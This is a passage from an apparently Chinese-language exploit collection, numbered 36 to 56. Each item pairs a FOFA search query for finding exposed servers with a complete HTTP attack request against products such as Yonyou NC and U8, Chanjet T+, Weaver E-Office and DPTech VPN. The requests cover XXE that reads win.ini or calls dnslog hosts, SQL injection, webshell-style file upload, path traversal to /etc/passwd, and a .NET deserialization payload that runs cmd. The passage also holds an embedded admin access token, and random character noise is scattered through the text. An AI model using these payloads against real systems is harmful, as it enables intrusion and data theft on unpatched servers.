2 o, R# q' s1 o# w# K1 h6 {Connection: close4 f9 U; h- N: t! q
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA# I6 Z& A, s$ }. C
Content-Length: 190
* Q x: ^: O6 A' C" `Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df01 }+ f8 e* y. A5 V' o3 g5 W
2 @* X( d6 O7 b4 d& y4 m
--fd28cb44e829ed1c197ec3bc71748df03 d* G% F% C) D9 G4 D, x
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"
% h4 ?, ?9 W2 \2 G& @! O8 H% b
; J k: W4 r" y, P% u, G<%out.println(1111*1111);%>
* S2 t( e6 A- B+ c# W" c9 S7 F! @--fd28cb44e829ed1c197ec3bc71748df0--
& p/ s3 o; @8 @+ N9 E$ S
9 u- ~7 }$ J: t9 ^
* [+ k- J$ O5 `5 c36. 用友NC-Cloud soapFormat XXE
4 z! p- ?" s1 z1 O0 }- ^FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
& ]) x. l. j- u$ [POST /uapws/soapFormat.ajax HTTP/1.1
* C4 K6 z# c! e' yHost: 192.168.40.130:8989
! B- n- y( R: Q0 T5 d FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
- B* q3 W7 M; V( ?1 Q& W: xContent-Length: 263
, O: d$ \2 _) s, u) `- q/ GAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
5 Y) F' D) C; p- a3 i, uAccept-Encoding: gzip, deflate
" M' n& v/ q. d, l- P, S& `Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 z) m' w& {$ d: M% Y4 K; b. VConnection: close4 s; W g) h2 T% J( _; w2 F1 C
Content-Type: application/x-www-form-urlencoded
3 }5 ?+ v% O9 r. \( S/ @ xUpgrade-Insecure-Requests: 1
% q1 Z5 G9 H5 m1 p) B5 w, u' L* f! j/ y: L0 g3 r& o' e
msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a* O9 C, S1 a0 T# @. r$ M9 M# Y/ Z
* l7 @7 F* _" e1 B" j0 ^
% v* C# G* s/ H$ T8 r
37. 用友NC-Cloud IUpdateService XXE2 \; B% G' u! G" s' {* k# P* U- @
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/", _+ |" d: p6 s: g' C. F2 C, M
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1. l2 i3 Z* T9 K" K1 j
Host: 192.168.40.130:8989( g" b6 c6 r( F. d+ ?( d
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
0 B+ H7 t* A& a. s# EContent-Length: 421
3 M- F6 }6 A3 j& ^Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
) W7 q4 _$ H- X* U" V: C# WAccept-Encoding: gzip, deflate ]2 T4 }* l# L. X; w. T7 @
Accept-Language: zh-CN,zh;q=0.9
: `/ r& F$ J3 _- p5 zConnection: close3 [* g7 @( j' F
Content-Type: text/xml;charset=UTF-8
! B% p8 o p. \7 Q) P/ CSOAPAction: urn:getResult
4 z4 X2 H% L- zUpgrade-Insecure-Requests: 1) \3 B6 j+ C: k5 } c
! v9 o6 A/ [4 M5 b4 G<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
5 _! l. a" X3 E6 O0 u<soapenv:Header/>8 j, ]$ V* s1 n5 ]. v8 I
<soapenv:Body>
& @$ a5 t$ B0 o/ u+ s, i<iup:getResult>
+ q# e5 j8 S7 U<!--type: string-->
& n' C' f5 ]1 c" }3 ^) H<iup:string><![CDATA[. C* L: ]- M$ ^5 ?9 x
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>" P" d8 P3 g' F$ J( t! {
<xxx/>]]></iup:string>
, a5 C+ ?! A, R. {# E) k</iup:getResult>
( f6 \. k# u' R2 Q/ o5 x: x4 D</soapenv:Body>2 W3 g7 j. f! X0 ^
</soapenv:Envelope>$ G! a. m+ M1 J" X
7 E. P9 L. W, [3 n3 R7 y
# y% L, q3 L$ G/ n. K3 w
8 U9 z0 \0 K) e; ]# p( w( `* Z38. 用友U8 Cloud smartweb2.RPC.d XXE
& i+ k' r" D* |FOFA:app="用友-U8-Cloud"
( U6 i* X" D8 J' W) @3 j2 ?1 @POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.18 w3 ?' ]: w0 P* `% c2 m. \
Host: 192.168.40.131:8088
5 q: L2 I2 ]5 L1 ]6 F' I- r# EUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
$ j" C( ~* I$ k7 m% I' v hContent-Length: 260
$ v$ I2 \% J+ M) W- _" iAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
, I$ ~% p& o7 M( M; gAccept-Encoding: gzip, deflate
' w: l8 Z: ^4 BAccept-Language: zh-CN,zh;q=0.9
4 L: B9 y) U2 X' q6 h0 G7 ?Connection: close
- X% m. i( N8 U8 K; _3 @ v `: kContent-Type: application/x-www-form-urlencoded
( A/ [3 ~: b/ W; r# Q' u4 r% X v5 Q8 u" ?2 J$ z" S
__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>" H% L4 G' R: H1 h' {6 _3 J2 g8 D
9 h) f4 V$ U# z& D
& M! N: V: i: s; [
39. 用友U8 Cloud RegisterServlet SQL注入
) \" i; d, c! y' p9 E) {- |$ ?1 X3 ~FOFA:title="u8c"$ t- c+ g4 V5 g" @( b$ q; G
POST /servlet/RegisterServlet HTTP/1.1# n3 Y1 L2 U( t' J$ L8 Z
Host: 192.168.86.128:80898 F0 H Z: H2 `3 v
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
8 ~1 l' j; A8 L1 I: a0 i4 j5 cConnection: close
& Z* c+ z* ~, k' b" ~Content-Length: 85. d$ J4 o, ^* y3 \- h, U
Accept: */*! P9 h% c" R% G. l
Accept-Language: en9 G% S3 F+ C7 D+ t$ f8 O
Content-Type: application/x-www-form-urlencoded
' X; c) K5 c& v! ~7 }# J8 S. P5 yX-Forwarded-For: 127.0.0.1& Y }. C8 d. c& ~$ H
Accept-Encoding: gzip
* c" W! J4 I/ t( x& Q
0 i3 S3 m! K: X4 @0 }2 A* t" M' ]usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--
7 p: @( A3 j' W/ e, C' ~1 s) I) ]7 i+ j4 T5 ^7 _7 F
5 w* G1 D ~3 |+ N2 I L0 v" q40. 用友U8-Cloud XChangeServlet XXE
# ]: [2 T! ]: O o9 w. k7 iFOFA:app="用友-U8-Cloud"# _" f/ d: C) o; p/ W
POST /service/XChangeServlet HTTP/1.1% y. E* G. z* c. Y0 u
Host: x.x.x.x
5 ^% S* i c2 K$ s8 K H7 [User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.360 f' F) P$ B/ f5 A/ ?( i, F- H6 z
Content-Type: text/xml; H" t$ j' s$ P- C
Connection: close: ~1 B+ \5 S7 k _' [, Q& {
4 c7 C9 P# ^+ t8 s1 e<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>$ f) e6 i3 u) q
4 w" m8 j3 c+ w0 C8 D W9 ^" s+ j7 F1 z/ J
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入2 f2 P2 y- y: K! q+ T& V% j% w6 X
FOFA:app="用友-U8-Cloud"
3 M+ Z; a" Q, H0 KGET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
- b+ r) [/ z- l; h0 }' |Host:9 a ^3 d d4 @0 _! G8 a
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.159 H" u5 @. w8 Z1 g: R8 @
Content-Type: application/json
C/ D2 |* ^2 G2 ^. t; dAccept-Encoding: gzip% Z2 p( N; M5 ^9 j% O0 \; b
Connection: close
: v" E! ]1 U- W6 f( r" y
2 \5 u8 g0 W5 |8 m2 ]8 v( h$ [0 c @2 P! H& f$ v+ L" g2 K6 V- g& {$ w/ H
42. 用友GRP-U8 SmartUpload01 文件上传 V* _7 T! F# |3 N
FOFA:app="用友-GRP-U8"
: N6 A' o, b, G- k/ F- \% E/ J% BPOST /u8qx/SmartUpload01.jsp HTTP/1.1
; ] B, b- J+ eHost: x.x.x.x
: y7 k/ B, J6 Q6 `* y3 E. xContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt3 @. r8 z q1 ]: }: w1 K8 k
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
9 X$ `, e! _; P; l7 z3 ]! j, s# F1 ^
4 B. O3 X7 w0 s J) f& HPAYLOAD
: t% Y! o! I: W% m. T K2 c' F
4 O. W# s9 G/ ^2 {8 E
, S# w' w8 M2 S0 W; ghttp://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml
' V+ l8 v/ z9 a7 T) m
- q! M7 t$ t0 S# i43. 用友GRP-U8 userInfoWeb SQL注入致RCE
2 D6 N3 I. [9 {% `0 t4 | yFOFA:app="用友-GRP-U8"
2 U( K2 ~6 Y s% x7 g' m* LPOST /services/userInfoWeb HTTP/1.1 t" @( n# |$ q
Host: your-ip
5 D% F2 ~4 w5 I# j8 n- K" fUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36; F D3 _0 B+ M% R" d8 [6 C; {
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.75 C$ I" i! m w& J! ^ ^- S
Accept-Encoding: gzip, deflate F+ p& m: ?) O
Accept-Language: zh-CN,zh;q=0.99 p1 ]9 ^+ ^) W/ S0 Y2 N- P; Q9 C
Connection: close
( M; R& f$ c6 D( S; }& d" `, d2 ~; k" OSOAPAction:7 w. d" W0 n: B% y
Content-Type: text/xml;charset=UTF-8( O2 g! ~* z' _. I
2 O& c& G% J* X6 T+ Q% B! G
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
5 K9 O2 Y+ o7 l5 y) M3 t0 ~2 u <soapenv:Header/>( Z- L B3 g0 `4 c5 _; C
<soapenv:Body>
9 @1 L* Y2 @* z0 ]. H% J <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
7 _3 f% F) _1 \3 y, w/ w# X <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>% s4 r- N# |2 L, _" n; a' l! t
</ser:getUserNameById>
" N* ]. `" r" x9 T" P& [ </soapenv:Body>, q8 H6 \; r; e; S" ?+ ^. L
</soapenv:Envelope>
* @ n( y4 m- c; O; b, i0 c# h- [3 Y; L; V2 S
+ |+ z7 T% p* {! R2 M( f44. 用友GRP-U8 bx_dj_check.jsp SQL注入% k! \& ]; C4 ] _2 p- k3 m
FOFA:app="用友-GRP-U8"
# u$ d3 S( ?6 {6 h7 xGET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.11 z+ N, V+ j" p6 i1 R% j6 A8 L& Z
Host: your-ip
; K8 i# O& l5 }0 c: zUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 [6 Z& N/ s9 o B
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
, ~- t; U+ P/ r# JAccept-Encoding: gzip, deflate
3 x6 ~5 m( t! rAccept-Language: zh-CN,zh;q=0.9* D0 o8 p( Z2 e+ ?" K8 U
Connection: close0 M) Q0 D4 l; ?2 c% A& Y
. n" n# V' \& y! x
8 M5 v( [0 s' E7 m
45. 用友GRP-U8 ufgovbank XXE
/ N7 m7 F" s6 S9 y" i- O; V# ]FOFA:app="用友-GRP-U8"$ u/ p" K0 B% n; u
POST /ufgovbank HTTP/1.1/ c! _1 C/ D1 C( e1 X& I
Host: 192.168.40.130:222( j/ R# `3 h3 z* ?' }0 d+ J; n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0/ j# {* j. g- F4 R5 j7 \
Connection: close! W# e8 ~0 D s+ ~
Content-Length: 1612 X- @6 S, a+ o3 }$ o3 T3 y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
0 K; W: g) Q/ N% YAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.21 N- |- V" m9 Y
Content-Type: application/x-www-form-urlencoded& M5 ^, @- u3 Y) C* K# _* A
Accept-Encoding: gzip
7 x) x1 X. {3 F4 N7 [ v* i
5 c6 k1 H1 ^$ g, f' A. F) G! n" J, D( {reqData=<?xml version="1.0"?>
( N5 W8 ]5 H3 q, k<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest- n0 q( u' J4 r' t4 X: T
$ D7 z$ m5 J+ `3 F
6 n, Y1 ~7 D+ N4 P0 S
46. 用友GRP-U8 sqcxIndex.jsp SQL注入
* L G, {4 u* S( k* V* d6 yFOFA:app="用友-GRP-U8"
3 S* y6 K# L! AGET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
9 ~. r: w7 b& O1 p& ^Host: your-ip- t/ H _3 t5 w! F/ W
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36/ m6 S# O8 |2 N+ H
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
, Y9 ?$ }# y! K3 dAccept-Encoding: gzip, deflate" s' C9 r7 O7 d( S
Accept-Language: zh-CN,zh;q=0.9" x( z+ _9 A+ @1 G1 F1 u$ T* h
Connection: close/ c3 c7 I" B7 C5 {, T2 ?5 X* n3 W
9 R5 N" I* c8 R' S$ b- _) i1 o% |8 e" t! `% Q
47. 用友GRP A++Cloud 政府财务云 任意文件读取 b: y- p: F2 B1 ^' i1 U
FOFA:body="/pf/portal/login/css/fonts/style.css"% h9 @2 i0 ~5 \+ \
GET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1
1 X { x5 ~1 J' z7 \7 u/ rHost: x.x.x.x: N1 ]8 f. V0 n" l% B# D
Cache-Control: max-age=0
* `0 g+ H t* \0 }Upgrade-Insecure-Requests: 1% R4 Z; X" F9 C3 a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36* U% y! s# ]' s4 O+ x' q1 p6 R
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
/ B+ K7 Q! s, J0 d/ }$ W! |Accept-Encoding: gzip, deflate, br
. C' N3 j4 J: \Accept-Language: zh-CN,zh;q=0.93 m7 z( g" e% c0 ]
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT/ P; k, z# C' y( ^
Connection: close8 t: c* s+ u7 H5 A( s; m
. W- O" H4 l7 u8 }! L
7 l- G2 @8 U& e F3 e H* Z' u8 U1 [ S X- ?3 ?% ^" d
48. 用友U8 CRM swfupload 任意文件上传
: t: M/ p" N( R @1 R5 |1 G) B' LFOFA:title="用友U8CRM"
. g F9 [. J, {- K7 S- d+ LPOST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1$ E5 h8 l1 M J! o$ s4 x
Host: your-ip
- p4 U0 P3 o' Q7 vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.08 b0 U5 m$ E% Q. l# b3 q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
- o K+ W' K0 g4 ^( M5 `Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
2 x( D' m8 S" F- G2 _% ^Accept-Encoding: gzip, deflate
' e8 B9 Y. r0 K! zContent-Type: multipart/form-data;boundary=----269520967239406871642430066855
+ w6 }6 E c4 j W( f# j# P7 O------269520967239406871642430066855. ]! W+ H( ?7 M7 R) T
Content-Disposition: form-data; name="file"; filename="s.php"
2 z& n; N( C5 Q2 n7 E. e1231 R5 S7 Z7 s; `& D- `9 M
Content-Type: application/octet-stream
# A x R- i' T8 R2 D5 W6 Z------269520967239406871642430066855
/ c Y9 W2 J# B. h# e9 d, gContent-Disposition: form-data; name="upload"
+ O0 M8 z" ^8 {6 u( F$ @! L* `upload& q z/ s0 Q" x6 v+ K
------269520967239406871642430066855--
v7 s3 w- g- t" E- [
4 C+ }5 y# }9 ^" i1 h. `; s: r( ]
49. 用友U8 CRM系统uploadfile.php接口任意文件上传5 t9 r+ Z0 y, N" F$ P
FOFA:body="用友U8CRM"( i# \# b7 o& ]% d! f, H
- {/ W' e: M8 F: N# t$ G, xPOST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
x g# @# F. x) WHost: x.x.x.x5 a: O: V' `! C8 ^0 v
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.02 a. B& c* b6 v" T/ F# B
Content-Length: 329
6 f+ F8 }1 c$ d2 v4 s+ f/ }Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
3 I4 L+ A V: m! e& i9 b Y5 [- F5 [Accept-Encoding: gzip, deflate% E$ p6 E8 g+ T. ?" ?
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
s% T1 d$ s' HConnection: close
7 d+ a' n0 V3 G; p. zContent-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w0 z6 K2 ?6 N, C: u$ s
+ z% ?& N! r! ~0 [) T. O, h-----------------------------vvv3wdayqv3yppdxvn3w' L3 I5 E) f" T+ b
Content-Disposition: form-data; name="file"; filename="%s.php "
7 D. n; _( W! D) W0 D+ i$ TContent-Type: application/octet-stream; o0 G% P4 \, R; b# Y
7 T ?0 D4 `: v5 p G2 U* l
wersqqmlumloqa5 C6 Y V- r* T+ v7 D( B
-----------------------------vvv3wdayqv3yppdxvn3w5 x( l/ w2 Y7 _9 u- T3 P8 ?
Content-Disposition: form-data; name="upload"/ h9 Y4 s. b0 |0 j. E _7 V
/ d9 ^3 u: P% E2 r4 {
upload6 W% g$ o8 {0 Q0 P' f% {
-----------------------------vvv3wdayqv3yppdxvn3w--% }" Q6 `/ K& m) L! @* a' j
6 \- Z& y- p8 T; p2 u) k7 C8 [: f, K8 Z$ Y4 F- I
http://x.x.x.x/tmpfile/updB3CB.tmp.php# g; q1 j& N9 _+ |4 M% ` Q
: |0 |9 F5 G! _* a. P! V9 N
50. QDocs Smart School 6.4.1 filterRecords SQL注入
, Y9 o" d9 q' u! \1 T$ aFOFA:body="close closebtnmodal"; T1 i/ L) x0 o, X; a" ?, G2 U$ W
POST /course/filterRecords/ HTTP/1.1- Q |. L( r0 z+ }& J
Host: x.x.x.x7 W3 T' C/ s% a7 W9 z! q0 i( F
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
( y/ a: b; j9 o2 lConnection: close0 d# N6 v- r7 T. l% \# U) J
Content-Length: 224
' [2 V5 |5 ^5 s! ^. DAccept: */*
9 p: M; k+ x0 G' g' a& cAccept-Language: en
# x- n3 D6 D4 P: Z6 {! ZContent-Type: application/x-www-form-urlencoded$ G, N8 J/ O0 g8 Z. T5 w4 w
Accept-Encoding: gzip% r/ P* q8 w: p! Y C* P9 B
' }5 z: c7 V, m$ ]searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1% i, D3 Y& g. n3 X( K
4 \+ e( I$ H _2 ^+ u7 v
# w: I5 O- h" X2 ~. l+ B; ]
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入6 ?! Y. Z6 y# P8 t6 {' y
FOFA:app="云时空社会化商业ERP系统"+ H; Y2 n+ ~0 h c, k5 Q. _
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1; y# P: c; g c8 X6 Z6 ~
Host: your-ip
: \4 L6 G; W+ c7 W/ D, N( N. bUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
* A, Z }7 F4 yAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9( r$ j# X3 t2 C& E
Accept-Encoding: gzip, deflate
- ?3 Q# s0 G" J) d" ?& s# s8 Q2 O7 fAccept-Language: zh-CN,zh;q=0.97 M0 N3 a# n9 z: q% t
Connection: close
4 G2 V {) y& P, p6 J0 I. ~* n9 F# |' H4 e0 w" k5 B* f
; i) X) p" H* j0 N
52. 泛微E-Office json_common.php sql注入5 i U5 @9 }6 l1 f: r' e
FOFA:app="泛微-EOffice"
4 E4 x# C9 v4 C, }POST /building/json_common.php HTTP/1.1
; X! N& M; a# A2 u- z, N$ t: JHost: 192.168.86.128:8097 X' _% M9 e: R2 W
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
! ?" t4 s; z' S8 BConnection: close1 m6 Y+ M8 T/ f+ g( W
Content-Length: 87: {: Q7 P+ g. `# ?
Accept: */*
( Z: k; {) K; W; H8 RAccept-Language: en6 S- }- U' R y% T1 W
Content-Type: application/x-www-form-urlencoded
6 P4 z, S* z3 TAccept-Encoding: gzip
. U Q* C; Q% L/ x' c8 `( l# M. l! L5 c& Z1 `3 n" g- h
tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333
2 O' K6 u0 c5 ~$ _: B
7 E' Q6 Z# D5 i$ L; W b" ?; M/ d4 r. q8 }7 N5 l6 q
53. 迪普 DPTech VPN Service 任意文件上传; c" X, S' q4 N0 F4 d& C
FOFA:app="DPtech-SSLVPN"2 T- h" h$ ~! k; k
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
2 D' g- l" ]6 N0 X2 V. q# U/ O2 ?# w: Z' ^
6 L, c2 s8 Y+ |
54. 畅捷通T+ getstorewarehousebystore 远程代码执行
+ Z" v! O8 y& Y; E9 K1 L7 jFOFA:app="畅捷通-TPlus"
% ^+ x9 _+ C7 G |" _5 S第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件
( }% M6 v2 s Z- L8 p"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
" C0 D: S4 O/ K+ I
, o; S- o( s$ N
: A' j. Z' z( d/ p. }完整数据包
% }6 a9 L! o8 ]! g9 wPOST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.13 y, Q' C* M: K2 s# N& K* `
Host: x.x.x.x1 c: H2 k* ]" |& r5 ?( |) \3 u' H$ O
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
$ _8 M; C) p& p, O" TContent-Length: 593
/ D/ k* t. n4 \# y* F- r2 ~
8 Z1 s( O5 q2 L% W{
) ?+ ?) R6 p* D, G"storeID":{* e! R2 x* ~6 R$ L/ @% z& ?& K
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",: x* j1 P. \8 ~# K9 @ _
"MethodName":"Start",- P3 A, }& f4 q1 y7 q6 d4 T U
"ObjectInstance":{
. o6 P- \4 I: ? H# ]! l( y "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",( C# {, p; N$ \9 L6 |4 z5 m
"StartInfo":{
7 d$ S% r/ z e- r' X "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",9 d" {+ w) ?# w/ r* u$ R
"FileName":"cmd",
6 M" E# D" C# B U) i S "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt": v0 g6 e: ?/ `6 A9 {7 Q3 q
}
; ]3 E" W3 \" Y1 m) R: l) m/ P/ u }! T" O9 s) r2 f5 ?8 ^
}8 V/ |& D4 [& P
}
- ?+ |+ N0 G3 g5 y9 \
( ]& R5 L6 C! T* g! _) }+ g- C
8 L& w C# P' m6 O- R8 V第二步,访问如下url* v3 Z4 z0 H. D1 u/ v2 H) z
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt% |) e" P- h5 B+ i! M: B- {$ J
$ P* R$ q. T" F/ p @+ W z% A; u5 F, I6 Z/ x! ]. X7 E
55. 畅捷通T+ getdecallusers信息泄露/ i3 [+ B5 y7 p L; e- i
FOFA:app="畅捷通-TPlus"
2 B0 W" ], z5 m2 ~& K第一步,通过( u4 T% N$ G1 s7 v+ l# U: r8 y& m
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie' \7 p; r9 J/ h
第二步,利用获取到的Cookie请求7 Y7 u- F, p) ~: D4 _
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers- N, k8 o2 g$ c5 X
! T7 u6 g! B3 c$ u2 K4 Y# V) X56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
( d3 D* h l |: I5 NFOFA: app="畅捷通-TPlus"
. o1 x+ i5 [% L6 o: y2 l4 h" kPOST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
( e k5 ]" B. Z3 {4 P% `+ RHost: x.x.x.x% ]7 B( X- U% V5 I0 p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
k2 j0 i$ g* E x9 |Content-Type: application/json
m! B1 N" z N: t; p, @7 u$ `& i! h+ Z
{
% J0 t: f' W. e) M6 n "storeID":{
